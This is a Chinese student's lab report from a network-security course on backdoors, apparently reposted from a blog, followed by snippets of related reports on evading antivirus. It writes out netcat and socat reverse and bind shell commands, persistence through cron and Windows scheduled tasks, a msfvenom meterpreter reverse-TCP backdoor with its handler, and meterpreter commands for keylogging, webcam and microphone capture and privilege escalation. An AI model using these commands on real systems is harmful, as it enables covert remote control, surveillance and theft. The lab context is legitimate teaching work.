# 2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp2 后门原理与实践

2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp2 后门原理与实践

1.实验内容 (3.5分)

1.使用netcat获取主机操作Shell,cron启动 (0.5分)

2.使用socat获取主机操作Shell, 任务计划启动 (0.5分)

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

2.基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
  • 下载破解软件时,可能会捆绑一些木马文件,下载软件的同时电脑也中招了
  1. 例举你知道的后门如何启动起来(win及linux)的方式?
  • Win:设置为开机自启动、修改注册表,通过用户执行触发
  • Linux:使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动
  1. Meterpreter有哪些给你映像深刻的功能?
  • 在植入后门后,可以控制被控主机的shell,执行指令;获取被控主机的录音、录像、截图、键盘输入记录等.
  1. 如何发现自己有系统有没有被安装后门
  • 查看开机自启动项、注册表项中是否有可疑程序
  • 安装杀毒软件,经常检查,扫描电脑

任务一:使用netcat获取主机操作Shell,cron启动

1.1、Windows获得Linux Shell

在Windows下使用ipconfig查看本机IP为192.168.0.103

使用ncat.exe程序打开监听ncat.exe -l -p 5333

在kali中反弹连接Windows,ncat 192.168.0.103 5333 -e /bin.sh,使用-e选项执行shell程序,windows已经获得kali的linux Shell

1.2、Linux获得Windows Shell

在kali中使用ip addr查看IP为192.168.253.128

打开监听nc -l -p 5333

在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.253.128 5333

kali成功获得Windows的命令提示

1.3、使用nc传输数据

Windows下监听5333端口,ncat.exe -l 5333

kali反弹连接到Windows的5333端口,nc 192.168.0.103 5333

1.4、使用nc传输文件(将文件从kali传给Windows)

Windows下监听5324端口,并把收到的数据保存到file5333.out中,ncat.exe -l 5333 > file1.out

kali 反弹连接到Windows的5333端口,nc 192.168.0.103 5333 < file1.in

连接建立成功,Windows可以收到kali发来的文件。

1.5、 使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

crontab -e指令增加一条定时任务,-e表示编辑。因为是第一次编辑,故提示选择编辑器,这里选择的是3。

最后一行添加22 * * * * /bin/netcat 192.168.0.103 5333 -e /bin/sh,意思是在每个小时的第22分钟反向连接Windows主机的5333端口。

时间到达22分的时候,如下图

任务二:使用socat获取主机操作Shell, 任务计划启动

socat是ncat的增强版,它使用的格式是socat [options]

,其中两个address是必选项,而options是可选项。

socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

在此电脑中点击管理点击任务计划程序,再点击创建任务填写任务名,新建一个触发器,选择定时启动

选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5333 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5333,同时把cmd.exe的stderr重定向到stdout上:

创建好后任务准备就绪,到达2:01后,刷新,可以发现之前创建的任务已经开始运行。

此时,在kali中输入输入指令socat - tcp:192.168.0.103:5333,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5324端口,此时可以发现已经成功获得了一个cmd shell

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 -f exe > 20175333_backdoor.exe,这里的IP地址为控制端IP,即KaliIP,可见已经生成了后门程序“20175333_backdoor.exe”

在Windows下执行ncat.exe -l 5333 > 20175333_backdoor.exe,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5333 > 20175333_backdoor.exe指令,通过-lv选项看到当前的连接状态,在kali中执行nc 192.168.0.103 5333 < 20175333_backdoor.exe(这里的IP为被控主机IP,即WindowsIP)

在kali上使用msfconsole指令进入msf控制台

输入use exploit/multi/handler使用监听模块,设置payload

set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

set LHOST 192.168.149.129,这里用的是KaliIP,和生成后门程序时指定的IP相同

set LPORT 5324,同样要使用相同的端口

设置完成之后,执行监听,并运行Windows下的后门程序,此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频(可以使用-d选项设置录制时间)
  • 使用webcam_snap指令可以使用摄像头进行拍照
  • 使用keyscan_start指令记录下击键的过程,使用keyscan_dump指令读取击键记录
  • 使用screenshot指令可以进行截屏
  • 使用getuid指令查看当前用户,使用getsystem指令进行提权操作

  • kali ip

  • windows ip

4.实验总结与体会

本次实验真是绝了,只要有一个后门进程可以运行,操纵目标机对于我们来说如同探囊取物,让我深刻的认识到电脑安全的重要性。个人信息极易被泄露,我们要时刻注意保护自己的隐私。

刚开始是在winxp上做的实验,到处报错,心态给我整崩了,换到主机上做就好多了,一路畅通。这次试验我也是按照学长的博客一步一步来完成的,其实中间有很多东西值得我们自己思考,但时间有限,力所不及只好照搬,希望我自己有机会可以再次深入的学习实验。

原文地址:https://www.cnblogs.com/Hf-Hf/p/12549844.html

时间: 2024-08-04 17:22:28

# 2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp2 后门原理与实践的相关文章

2019-2020-2 网络对抗技术 20175206李得琛 Exp3 免杀原理与实践

目录 实践内容 实践过程 任务一:正确使用msf编码器 任务二:msfvenom生成如jar之类的其他文件 任务三:veil 任务四:加壳工具 任务五:使用Cshellcode编程 任务六:使用其他课堂未介绍方法 任务七:通过组合应用各种技术实现恶意代码免杀 任务八:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 实践问题 基础问题回答 实验总结与体会 思考题 实践内容 任务一:正确使用msf编码器 任务二:msfvenom生成如jar之类的其他文件 任务三:ve

2017-2018-2 20155230《网络对抗技术》实验3:免杀原理与实践

基础问题回答 1.杀软是如何检测出恶意代码的? 杀软检测恶意代码主要有三种方式: ①特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的字符串组成,且是只有该病毒内才出现的字符串,根据已检测出或网络上公布的病毒,对其提取特征码,记录在病毒库中,检测到程序时将程序与特征码比对即可判断是否是恶意代码. ②启发式恶意软件的检测:将一个软件与恶意软件的行为.代码等作比对,如果发现相似度达到一定程度,即判定这个程序为恶意代码,有一定误报可能. ③基于行为的恶意软件检测

2019-2020-2 网络对抗技术-20175332 张苗-exp3 免杀原理与实践

目录 1.基础问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.开启杀软能绝对防止电脑中恶意代码吗? 3.实践过程记录 4.实践总结与体会 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码 启发式 基于行为 (2)免杀是做什么? 软件或代码免于杀毒软件的检测 (3)免杀的基本方法有哪些? 改变特征码 只有.exe --加壳(压缩壳 加密壳)运行时慢慢释放 机器指令已提取(有shellcode/meterpreter)用encod

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题 例举你能想到的一个后门进入到你系统中的可能

2018-2019-2 20165204《网络对抗技术》 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165204 Exp2 后门原理与实践 一.实验内容 1.准备阶段 kali虚拟机,win10本机(我黑我自己) 关闭防火墙 两机ping通.其中win10主机IP为10.1.1.138,kali虚拟机IP为192.168.255.131. 2. 使用netcat获取主机操作Shell,cron启动 首先我们先通过反弹端口在win10端获得kali的权限. 在win10中ncat文件夹内(内含ncat.exe)输入ncat.exe -l -p 5204,

2018-2019-2 20165217《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165217<网络对抗技术>Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反